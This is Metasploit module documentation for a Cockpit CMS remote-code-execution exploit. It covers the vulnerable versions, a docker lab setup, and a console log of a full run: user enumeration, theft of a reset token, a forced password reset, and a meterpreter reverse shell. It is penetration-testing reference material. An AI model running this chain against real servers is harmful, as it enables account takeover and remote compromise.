dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/cockpit_cms_rce.md

3.7 KiB
Raw Permalink Blame History

Vulnerable Application

This module exploits two NoSQLi vulnerabilities to retrieve the user list, and password reset tokens from the system. Next, the USER is targeted to reset their password.

Then a command injection vulnerability is used to execute the payload. While it is possible to upload a payload and execute it, the command injection provides a no disk write method which is more stealthy.

The following versions of Cockpit CMS contain all the necessary vulnerabilities for exploitation:

  • 0.11.1
  • 0.11.0
  • 0.10.2
  • 0.10.1
  • 0.10.0

Install

Use docker:

docker run -p 8080:80 agentejo/cockpit:0.10.0

Or follow https://blog.sommerfeldsven.de/how-to-install-cockpit-cms-on-nginx/

MAKE SURE TO BROWSE TO /install TO FINISH INSTALL!!

Some useful addresses which don't seem to be well documented:

  • /finder for a file system browser
  • /accounts for adding accounts
  • /install to finish install

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/cockpit_cms_rce
  4. Do: run
  5. Do: set USER [user]
  6. Do: run
  7. You should get a shell.

Options

ENUM_USERS

Use CVE-2020-35846 to enumerate users on the system.

USER

Username to reset the password of, and login as to perform the command injection with. Defaults to ''

Scenarios

Cockpit CMS 0.11.1 on Ubuntu 20.04

Obtain list of users

[*] Processing cockpit.rb for ERB directives.
resource (cockpit.rb)> use exploit/multi/http/cockpit_cms_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (cockpit.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (cockpit.rb)> set verbose true
verbose => true
msf6 exploit(multi/http/cockpit_cms_rce) > check

[*] Attempting Username Enumeration (CVE-2020-35846)
[*] 2.2.2.2:80 - The target appears to be vulnerable.
msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "asdf22", "4g4gsegs"]
[-] Exploit aborted due to failure: bad-config: 2.2.2.2:80 - User to exploit required
[*] Exploit completed, but no session was created.

Exploit user

msf6 exploit(multi/http/cockpit_cms_rce) > set user asdf22
user => asdf22
msf6 exploit(multi/http/cockpit_cms_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "asdf22", "4g4gsegs"]
[*] Obtaining reset tokens (CVE-2020-35847)
[*] Attempting to generate tokens
[*] Obtaining reset tokens (CVE-2020-35847)
[+]   Found tokens: ["rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c"]
[*] Checking token: rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c
[*] Obtaining user info
[*]   user: asdf22
[*]   email: none@none.com
[*]   active: true
[*]   group: admin
[*]   i18n: en
[*]   api_key: account-8d9e39cf206a7392d292efc281e824
[*]   password: $2y$10$R4mShvdxnXxxnTH85apRLedSWfYbOk4qsGQwG7apOfdQBVRnhEcme
[*]   name: dsf22
[*]   _modified: 1618755509
[*]   _created: 1618755500
[*]   _id: 607c3fac62336679e30002c3
[*]   _reset_token: rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c
[*]   md5email: 3eda6fcd3204ef285fa52176c28c4d3e
[+] Changing password to BoicMQSMPv
[+] Password update successful
[*] Attempting login
[+] Valid cookie for asdf22: c8695f6d766afc426d0e99f58fb04e0d=d3t7e356h03eufhuc55g91kgsb;
[*] Attempting RCE
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:37260) at 2021-04-18 10:26:27 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu2004
OS          : Linux ubuntu2004 5.4.0-56-generic #62-Ubuntu SMP Mon Nov 23 19:20:19 UTC 2020 x86_64
Meterpreter : php/linux